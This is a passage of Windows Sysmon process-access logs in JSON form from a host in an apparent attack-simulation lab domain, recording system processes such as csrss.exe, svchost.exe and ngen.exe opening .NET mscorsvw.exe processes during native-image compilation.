\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7222,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.195\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-00100C8F0C00}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.195","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-00100C8F0C00}","TargetProcessId":"4964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7223,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.195\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-00100C8F0C00}\r\nTargetProcessId: 4964\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.195","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-00100C8F0C00}","TargetProcessId":"4964","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7224,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.226\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010A6920C00}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.226","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010A6920C00}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7225,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.226\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010A6920C00}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.226","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010A6920C00}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7226,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.242\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010A6920C00}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.242","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010A6920C00}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7227,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.273\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-00101E960C00}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.273","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-00101E960C00}","TargetProcessId":"668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7228,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.273\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-00101E960C00}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.273","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-00101E960C00}","TargetProcessId":"668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7229,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.273\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-00101E960C00}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.273","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-00101E960C00}","TargetProcessId":"668","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
